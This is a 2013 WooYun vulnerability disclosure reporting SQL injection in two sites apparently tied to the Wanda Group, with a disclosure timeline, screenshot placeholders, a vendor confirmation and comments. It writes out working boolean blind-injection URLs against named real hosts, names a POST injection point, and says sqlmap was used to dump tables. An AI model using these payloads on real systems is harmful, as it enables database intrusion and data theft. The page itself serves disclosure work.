当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042591

漏洞标题:大连万达集团分站SQL注入

相关厂商:大连万达集团股份有限公司

漏洞作者: xiaoL

提交时间:2013-11-11 16:15

修复时间:2013-12-26 16:16

公开时间:2013-12-26 16:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-11: 细节已通知厂商并且等待厂商处理中
2013-11-11: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向核心白帽子及相关领域专家公开
2013-12-01: 细节向普通白帽子公开
2013-12-11: 细节向实习白帽子公开
2013-12-26: 细节向公众公开

简要描述:

大连万达集团分站SQL注入,好好看了一下,这个站点没搜到。应该没有重复了!

详细说明:

发生注入的位置:http://performance.wanda.cn:80/type.do?tid=968060431-198325&sid=1474181411546235&treenews=2066209175-17633
注入点:sid
基于bool的盲注
http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='1&treenews=2066209175-17633

22.jpg


返回正常
http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='2&treenews=2066209175-17633
返回

21.jpg


友情提示:
您请求的地址不存在,frameworkException : null
一下就暴露了!
另外一个地方是
http://www.vans-china.cn/LoginUser post型的注入
USERNO=jAEd&PWD=&imageField.x=1&imageField.y=1
发现这个地方提交过几次了...今天也顺带试了一下...发现依然可以的...没有修复好...
基于时间的盲注

24.jpg


依然跑的出库

漏洞证明:

接下来就是直接用sqlmap来跑表了。
第一个地方:

23.jpg


第二个地方:

26.jpg

修复方案:

好好的修复一下...
过滤掉关键字

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-11 16:55

厂商回复:

感谢xiaoL同学的关注与贡献!此漏洞修复不完整,继续整改。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-11 17:01 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    好厂商!确认的好快啊...

  2. 2013-11-11 18:58 | 大连万达集团(乌云厂商)

    私信留个Q,联系一下呗